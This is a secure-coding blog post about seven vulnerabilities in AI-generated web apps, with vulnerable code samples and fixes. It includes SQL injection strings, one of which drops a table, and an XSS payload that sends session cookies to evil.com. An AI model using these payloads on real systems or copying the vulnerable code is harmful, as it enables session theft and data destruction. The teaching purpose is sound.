Security Holes Every Vibe-Coded App Has
You built your app with AI. It looks great, it works, users are signing up. But there's a problem you can't see from the UI: your app is almost certainly riddled with security holes.
This isn't a criticism of AI tools. They're optimized for getting features working, not for defense in depth. Security is adversarial thinking — anticipating how someone will try to break your system. AI code generators don't think like attackers. They think like demo builders.
Here are the seven security vulnerabilities we find in virtually every vibe-coded app we audit. Each one is exploitable, and each one has a straightforward fix.
1. Exposed Environment Variables
This is the most common and most dangerous vulnerability. AI tools frequently hardcode API keys, database credentials, and secret tokens directly in source code.
What it looks like:
// This is in your public GitHub repo right now
const stripe = new Stripe('sk_live_abc123realkey...')
const dbUrl = 'postgresql://admin:password123@db.example.com:5432/prod'
If your code is in a public repository, automated bots are already scanning for these. If it's in a private repo, a single compromised developer account exposes everything.
Even .env files aren't safe if they're committed to git. We regularly find production database passwords in git history.
The fix:
- Never hardcode secrets. Use environment variables loaded from .env files that are in .gitignore
- For production, use a secrets manager (AWS Secrets Manager, Vault, or even encrypted environment variables in your hosting platform)
- Audit your git history: git log --all -p | grep -i "password\|secret\|api_key" — if you find anything, rotate those credentials immediately
- Use different credentials for every environment
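A fail-fast loader turns a missing secret into an immediate startup error instead of a mysterious runtime failure. This is a minimal sketch — the variable names are assumptions, and process.env can be populated by your hosting platform or a dotenv-style loader:

```javascript
// Fail-fast accessor: crash at startup if a required secret is missing,
// rather than failing mid-request with an undefined value.
function requireEnv(name) {
  const value = process.env[name]
  if (!value) {
    throw new Error(`Missing required environment variable: ${name}`)
  }
  return value
}

// Hypothetical usage — adapt the names to your own app:
// const config = {
//   stripeKey: requireEnv('STRIPE_SECRET_KEY'),
//   databaseUrl: requireEnv('DATABASE_URL'),
// }
```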
2. No Input Validation
AI-generated backends accept whatever data you send them. No type checking, no length limits, no format validation. Every input field is a potential attack vector.
What it looks like:
// AI-generated: trusts all input
app.post('/api/users', async (req, res) => {
const user = await db.user.create({ data: req.body })
res.json(user)
})
An attacker can send { "role": "admin", "email": "anything" } and your app will happily create an admin user. Or send a 10MB string in the name field and crash your server.
The fix:
// Production-ready: validates everything
import { z } from 'zod'
const CreateUserSchema = z.object({
email: z.string().email().max(255),
name: z.string().min(1).max(100),
// role is NOT accepted from input
})
app.post('/api/users', async (req, res) => {
const data = CreateUserSchema.parse(req.body)
const user = await db.user.create({ data })
res.json(user)
})
Use Zod (TypeScript), Pydantic (Python), or your language's equivalent. Validate every input on every endpoint. Never trust the client.
3. Default Credentials and Open Admin Panels
AI tools scaffold admin panels with default usernames and passwords. Sometimes they don't even add authentication to admin routes at all.
We've audited apps where /admin was accessible to anyone who typed the URL. No login required. Full access to user data, configuration, and database operations.
What to check:
- Is your admin panel protected by authentication?
- Did you change the default admin credentials?
- Is the admin panel accessible from the public internet, or only from your internal network?
- Does admin access require multi-factor authentication?
The fix: At minimum, put your admin panel behind authentication with a strong, unique password. Ideally, restrict admin access to specific IP addresses or a VPN. Add MFA for any account with admin privileges.
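As a sketch, an Express middleware gating admin routes might look like the following. The req.session.user shape is an assumption — adapt it to whatever your auth library attaches to the request:

```javascript
// Reject unauthenticated and non-admin requests before any /admin handler runs.
// Assumes session middleware has already populated req.session.user.
function requireAdmin(req, res, next) {
  const user = req.session && req.session.user
  if (!user) {
    return res.status(401).json({ error: 'Authentication required' })
  }
  if (user.role !== 'admin') {
    return res.status(403).json({ error: 'Admin access required' })
  }
  next()
}

// Mount it in front of every admin route:
// app.use('/admin', requireAdmin)
```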
4. Missing CORS Configuration
Cross-Origin Resource Sharing (CORS) controls which domains can make requests to your API. AI-generated apps typically set CORS to * — meaning any website on the internet can make authenticated requests to your backend.
What it looks like:
// AI-generated: allows everything
app.use(cors({ origin: '*' }))
With a wildcard — or the common AI-generated variant that reflects any origin with credentials enabled — an attacker can build a malicious website that makes requests to your API from a visitor's browser, including your users' cookies when credentials are allowed. If a logged-in user visits the attacker's site, the attacker can act as that user.
The fix:
// Production-ready: whitelist your domains
app.use(cors({
origin: ['https://yourapp.com', 'https://app.yourapp.com'],
credentials: true,
}))
Only allow origins you control. Be explicit. In development, you can add localhost, but never ship * to production.
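One way to keep development and production origins apart without code changes is to read the allowlist from an environment variable. A sketch, where ALLOWED_ORIGINS is a hypothetical name of our own choosing:

```javascript
// Parse a comma-separated origin allowlist, e.g.
// ALLOWED_ORIGINS="https://yourapp.com,https://app.yourapp.com"
function parseAllowedOrigins(raw) {
  return (raw || '')
    .split(',')
    .map((origin) => origin.trim())
    .filter(Boolean) // drop empty entries from trailing commas
}

// Hypothetical wiring with the cors middleware:
// const allowed = parseAllowedOrigins(process.env.ALLOWED_ORIGINS)
// app.use(cors({ origin: allowed, credentials: true }))
```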
5. No Rate Limiting
Without rate limiting, your API is an all-you-can-eat buffet for attackers. Brute force login attempts, credential stuffing, API scraping, denial of service — all trivially easy when there are no limits.
What's at risk:
- Login endpoints — an attacker can try thousands of passwords per minute
- Password reset — send thousands of reset emails to harass your users
- API endpoints — scrape all your data or run up your infrastructure costs
- Signup — create thousands of fake accounts
The fix:
import rateLimit from 'express-rate-limit'
// General API rate limit
app.use('/api/', rateLimit({
windowMs: 15 * 60 * 1000, // 15 minutes
max: 100, // 100 requests per window
}))
// Stricter limit on auth endpoints
app.use('/api/auth/', rateLimit({
windowMs: 15 * 60 * 1000,
max: 10, // 10 attempts per 15 minutes
}))
At minimum, rate limit your authentication endpoints. Ideally, rate limit everything with sensible defaults.
6. SQL Injection
You'd think this was a solved problem in 2026. It's not. AI-generated code still builds SQL queries by concatenating strings, especially in search, filtering, and reporting features.
What it looks like:
// AI-generated: SQL injection vulnerable
app.get('/api/users', async (req, res) => {
  const users = await db.$queryRawUnsafe(
`SELECT * FROM users WHERE name LIKE '%${req.query.search}%'`
)
res.json(users)
})
An attacker sends search=' OR '1'='1' -- and gets your entire user table. Or worse: search='; DROP TABLE users; --.
The fix:
// Production-ready: parameterized query
app.get('/api/users', async (req, res) => {
const users = await db.$queryRaw(
Prisma.sql`SELECT * FROM users WHERE name LIKE ${`%${req.query.search}%`}`
)
res.json(users)
})
Always use parameterized queries or your ORM's built-in query builder. Never concatenate user input into SQL strings. This rule has zero exceptions.
7. Cross-Site Scripting (XSS)
AI-generated apps frequently render user-provided content without sanitization. If a user can input text that gets displayed to other users — comments, profiles, messages — XSS is almost guaranteed.
What it looks like:
// AI-generated: XSS vulnerable
function Comment({ text }) {
return <div dangerouslySetInnerHTML={{ __html: text }} />
}
An attacker submits a comment containing <script>document.location='https://evil.com/steal?cookie='+document.cookie</script> and steals the session of every user who views that comment.
The fix:
- Never use dangerouslySetInnerHTML with user content
- React escapes content by default — don't bypass it
- If you must render HTML, use a sanitization library like DOMPurify
- Set Content Security Policy headers to prevent inline script execution
// Production-ready: escaped by default
function Comment({ text }) {
return <div>{text}</div>
}
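If you ever need to embed untrusted text outside React's automatic escaping — say, in a server-rendered template or an email — a minimal escaping helper looks like the sketch below. Note this handles plain text only; for rendering user-supplied HTML, use a real sanitizer such as DOMPurify:

```javascript
// Escape the five HTML-significant characters in untrusted plain text.
// Not a sanitizer: rich user HTML needs DOMPurify or similar.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, '&amp;') // must run first so later entities aren't double-escaped
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
}
```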
The Compound Risk
Each vulnerability on its own is a problem. Together, they're catastrophic. An attacker finds your exposed API key (vulnerability 1), uses the lack of rate limiting (vulnerability 5) to enumerate users through the unvalidated API (vulnerability 2), and escalates to admin access through the default credentials (vulnerability 3).
Security is a chain. AI tools don't think in chains. They think in features.
What To Do Right Now
- Search your codebase for hardcoded secrets. Rotate any you find.
- Add input validation to every API endpoint.
- Configure CORS to only allow your domains.
- Add rate limiting to authentication endpoints at minimum.
- Run npm audit and fix critical vulnerabilities.
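The first checklist item can be partly automated with a quick scan. The patterns below are illustrative, not exhaustive — extend them for your own key formats:

```shell
# Scan the working tree for likely hardcoded secrets (illustrative patterns).
grep -rnIiE "(api_key|secret|password)\s*[:=]" \
  --exclude-dir=node_modules --exclude-dir=.git . \
  || echo "no matches in working tree"

# Scan full git history too — deleted files still live there.
git log --all -p 2>/dev/null | grep -iE "sk_live_|password|secret|api_key" | head -n 20
```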
This will take a day. It could save your company.
If you want a thorough review, book a free Quick Audit. We'll scan your codebase for these vulnerabilities and more, and give you a prioritized fix list. Also check our complete MVP to production checklist for the full picture.